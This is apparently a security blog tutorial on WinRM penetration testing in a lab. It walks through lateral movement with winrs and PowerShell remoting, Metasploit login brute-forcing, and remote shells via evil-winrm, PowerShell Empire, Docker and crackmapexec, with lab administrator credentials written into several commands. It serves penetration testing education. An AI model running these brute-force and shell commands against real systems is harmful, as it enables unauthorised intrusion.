Red Teaming

WinRM Penetration Testing

In this post, we will discuss all possible methods and tools used for WinRM penetration testing. Let’s get deep into WinRM service and its security assessment and learn more. This attack can be performed locally (using windows client machine) and remotely (using Kali Linux).

Lab Setup

Windows Server 2016:

Windows 10 client: 192.168.106

Kali Linux:

Table of Content

WinRM Service

  • History of WinRM
  • WinRM Configuration
  • Testing Connection

Lateral Movement- Locally

  • Connecting Server shell using CMD
  • Connecting Server shell using PowerShell

Lateral Movement- Remotely

  • Scanning
  • Identify the WinRM Authentication Method
  • Winrm Login Brute Force
  • Connect to Remote Shell through Ruby script
  • Connecting Remote Shell through Evil-WinRM
  • Connecting Remote Shell through PowerShell Empire
  • Connecting Remote Shell through Docker
  • Connecting Remote Shell through Crackmapexec

WinRM Service

WinRM is a command-line tool that enables administrators to remotely execute the CMD.exe commands using the WS-Management protocol. This specification describes a general SOAP-based protocol for managing systems such as PCs, servers, devices, Web services, other applications, and other manageable entities. It port 5985 for HTTP transport and 5986 for HTTPS Transport.

On server and client versions of the Windows operating system, Enable-PSRemoting allows the administrator to access the remote shell using Powershell for private and domain networks through WinRM service.

History of WinRM

Versions 1.1 of Winrm have been found in Windows Vista and Windows Server 2008. Its versions 2.0 have been found in Windows 7 and Windows Server 2008 R2 and the latest version 3.0 is pre-installed in Windows 8 and Windows 2012 Server, but you need to enable it in Windows 10.

WinRM Configration

Configuring and installing WinRM is quite simple, but you only need to execute commands below that will enable WinRM on the server for trusted hosts. Here we have given the wildcard character (*) for all the machines on the network. This type of configuration cloud is a threat to the server because it allows any machine to connect to a server that knows the server’s credential.

Enable-PSRemoting –force
winrm quickconfig -transport:https
Set-Item wsman:\localhost\client\trustedhosts * 
Restart-Service WinRM

Note:  WinrRM Service should be Enabled on both machine (Server and client)

Testing Connection

Now, with the help of the following command, we can check the server ‘s connectivity through any host machine on the network.

test-wsman -computername "WIN-S0V7KMTVLD2"
test-wsman -computername ""

As you can see, the version details of the protocol and the product have been revealed, so this shows that we are capable of connecting to the server.

Lateral Movement- Locally

Connecting Server shell using CMD

As we know, WinRM is used to get a remote machine shell just like SSH, so if you have compromised an account or system that is a trusted host, you can access the server shell with the help of CMD. Here, first, we try to run the system command remotely using the server credential and execute the following command.

winrs -r: -u:ignite.local\administrator -p:Ignite@987 ipconfig

Since we were able to run system command remotely thus, we try to access a remote shell with the help of the following command.

winrs -r: -u:ignite.local\administrator -p:Ignite@987 CMD

Connecting Remote shell using PowerShell

Just like a command prompt, you can also use PowerShell to remotely run arbitrary system commands and thus execute the following command through a compromised system.

Invoke-Command -ComputerName "" -Credential workgroup\administrator -Authentication Negotiate -Port 5985 -ScriptBlock {net user administrator}

As a result you can we have enumerated user details for the administrator account.

Similarly, you can use PSSession to get a remote shell with PowerShell, so we need to run the following and get a server shell.

Enter-PSSession -ComputerName -Credential administrator

Lateral Movement- Remotely


So, first, you need to scan the host IP in order to identify available ports for WinRM and Nmap is the best tool to do so.

nmap -p5985,5986 -sV

From its scan, we found that 5985 (HTTP) is available for unsecure WinRM connections and 5986 (HTTPS) is available for secure WinRM connections.

Identify the WinRM Authentication Method

Further use can you Metasploit auxiliary to identify Authentication Method used by WinRM. This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.

use auxiliary/scanner/winrm/winrm_auth_methods
msf auxiliary(winrm_auth_methods) > set rhosts

WinRM Login Brute Force

This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate (NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the ‘AllowUnencrypted’ winrm option must be set. Otherwise, adjust the port and set the SSL options in the module as appropriate.

use auxiliary/scanner/winrm/winrm_login
msf auxiliary(scanner/winrm/winrm_login) > set rhosts
msf auxiliary(scanner/winrm/winrm_login) > set user_file /root/user.txt
msf auxiliary(scanner/winrm/winrm_login) > set pass_file /root/pass.txt
msf auxiliary(scanner/winrm/winrm_login) > set stop_on_success true
msf auxiliary(scanner/winrm/winrm_login) > exploit

As a result, it will try a valid combination of username and password and dump the output accordingly.

Connect to Remote Shell through Ruby script

You can download the ruby script from GitHub that allow the Linux system to connect with Windows Protocol WinRM and provide the access of the PowerShell of the target machine. You can download it from here and add Target IP, username as well as password inside the download script then install WinRM in your local machine and execute the script.

gem install winrm
ruby winrm-shell.rb

As a result, you will get PowerShell access to the target machine as shown.

Connecting Remote Shell through Evil-WinRM

Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. In our previous article we have already discussed on Evil-Winrm and its usage, you can more about it from here.

evil-winrm -i -u administrator -p 'Ignite@987'

As a result, it will give access to victim shell by providing its PowerShell as given below.

Connecting Remote Shell through PowerShell Empire

Once you’ve compromised the host machine using the empire, as we’ve done here. Using Powershell Empire, you can perform post-exploitation to access the server shell via the client machine using the WinRM service.

usemodule lateral_movement/invoke_psremoting
set Listener http
set ComputerName
set UserName administrator
set Password Ignite@987

And finally! We got the shell of the server through client machine.

Connecting Remote Shell through Docker

Docker image of PowerShell with NTLM support to allow for PS-Remoting from Linux to Windows, hence we can use this to access the shell of the server by executing following command.

Read more from here.

docker run -it quickbreach/powershell-ntlm

Once it will install the docker image, you will get the session for login credential as shown below in the image. As soon as you will enter the server login it will give a shell of the server.

Connecting Remote Shell through Crackmapexec

Now using Crackmapexec we try to execute arbitrary system command remotely by connecting through port 5985 open for winrm. In our previous article we have already discussed on Crackmapexec and its usage, you can more about it from here.

crackmapexec winrm -u 'Administrator' -p 'Ignite@987' -x ipconfig

As a result, it gives the output for request command as shown.


Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here